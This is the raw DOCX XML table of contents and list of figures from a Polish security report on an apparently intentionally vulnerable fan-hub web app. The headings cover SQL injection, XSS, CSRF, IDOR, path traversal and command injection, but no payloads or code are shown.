          <w:t xml:space="preserve">14. Diagramy wygenerowane z Mermaid </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec49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0">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">14.1. Przepływ żądania </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec50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1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">14.2. Model przełącznika bezpieczeństwa </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec51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2">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">14.3. Drzewo ataku </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec52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53">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">15. Załącznik A: pełne karty testowe funkcji </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>........................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec53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4">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">15.1. Karta A1 - Vocaloid library search / SQL Injection </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>............</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec54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5">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">15.2. Karta A2 - komentarze fan postów / Stored XSS </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec55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6">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">15.3. Karta A3 - login / Broken Authentication </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>......................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec56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7">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">15.4. Karta A4 - profile settings / CSRF </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec57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8">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">15.5. Karta A5 - moderation queue / IDOR </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec58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9">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">15.6. Karta A6 - member directory / Sensitive Data Exposure </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.........</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec59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0">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">15.7. Karta A7 - fanart vault / Path Traversal </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>......................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec60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1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">15.8. Karta A8 - stream relay check / Command Injection </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.............</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec61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62">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">16. Załącznik B: mapowanie zmian w plikach kodu </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.....................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec62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63">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">17. Załącznik C: checklista weryfikacji na żywo </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.....................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec63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64">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">18. Załącznik D: najważniejsze różnice vulnerable vs secure </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.........</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec64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65">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">19. Załącznik E: argumentacja inżynierska </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...........................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec65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66">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">20. Załącznik F: macierz ryzyka dla funkcji aplikacji </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...............</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec66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7">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">20.1. Interpretacja macierzy </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>........................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec67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68">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">21. Załącznik G: kryteria akceptacji po poprawkach </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec68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9">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">21.1. Przykład testu akceptacyjnego dla profilu </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.....................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec69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70">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">22. Załącznik H: scenariusz omówienia dla prowadzącego </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..............</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec70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1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">22.1. Etap 1 - kontekst aplikacji </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec71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2">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">22.2. Etap 2 - ataki z poziomu użytkownika </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..........................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec72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3">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">22.3. Etap 3 - ten sam przebieg w secure </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec73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4">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">22.4. Etap 4 - powiązanie z kodem </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec74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5">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">22.5. Etap 5 - testy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sec75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76">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">23. Testy i weryfikacja </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec76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77">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">24. Literatura i źródła </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec77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78">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">25. Wnioski i dalsze rekomendacje </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec78 \h</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="2" w:name="sec2"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>1. Spis materiałów dokumentacyjnych</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Poniższe zestawienie zostało wygenerowane z treści raportu. Numery stron są polami referencyjnymi DOCX/PDF, tak jak w głównym spisie treści.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Spis rysunków</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Rysunek 1. Fanartowy motyw MikuMiku Fan Hub</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .......................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig1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2. Architektura aplikacji</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig2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3. Diagram Mermaid - architektura funkcjonalna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fig3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4. Mapa funkcja-podatność</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig4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5. Diagram Mermaid - mapa funkcji i podatności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fig5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6. Macierz ryzyka</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .........................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig6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7. Fan posts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ..............................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig7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8. Vocaloid library SQLi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ..................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig8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9. Security map</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ...........................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig9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10. Member directory</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ......................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig10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11. Fanart vault traversal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig11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12. Stream relay command injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ........................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig12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13. Profile CSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ..........................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig13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14. Moderation IDOR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .......................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig14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15. Schemat podatny/bezpieczny w aplikacji</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig15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16. SQL Injection vulnerable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ..............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig16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17. SQL Injection secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ..................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig17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18. sqlmap - wykrycie SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .......................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig18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19. curl - ataki HTTP na funkcjonalności aplikacji</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ........................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig19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20. HTTPie - weryfikacja SQL Injection i Path Traversal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ...................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig20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21. OWASP ZAP Docker - skan baseline aplikacji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fig21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22. Stored XSS vulnerable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig22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23. Stored XSS secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .....................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig23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24. CSRF vulnerable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .......................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig24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25. CSRF secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ...........................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig25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26. IDOR vulnerable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .......................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig26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27. IDOR secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ...........................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig27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28. Sensitive data vulnerable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig28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29. Sensitive data secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig29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30. Path Traversal vulnerable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig30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31. Path Traversal secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig31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32. Command Injection vulnerable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ..........................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig32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33. Command Injection secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ..............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig33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34. Diagram Mermaid - przepływ żądania</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ....................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig34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35. Diagram Mermaid - model przełącznika bezpieczeństwa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ...................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig35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Rysunek 36. Diagram Mermaid - drzewo ataku</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ........................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF fig36 \h</w:instrText>
